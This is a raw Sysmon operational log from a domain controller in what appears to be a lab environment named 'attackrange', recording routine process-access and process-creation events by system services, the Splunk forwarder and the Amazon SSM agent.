13:09:47.573{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.573{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.573{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.573{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.572{08A6967A-4298-6000-3000-000000009A01}23763608C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.572{08A6967A-429B-6000-5600-000000009A01}3848C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.509{08A6967A-429B-6000-5500-000000009A01}40324036C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.321{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.321{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.259{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5500-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5500-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-429B-6000-5400-000000009A01}39883992C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429B-6000-5500-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.256{08A6967A-429B-6000-5500-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429B-6000-5400-000000009A01}3988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5400-000000009A01}3988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 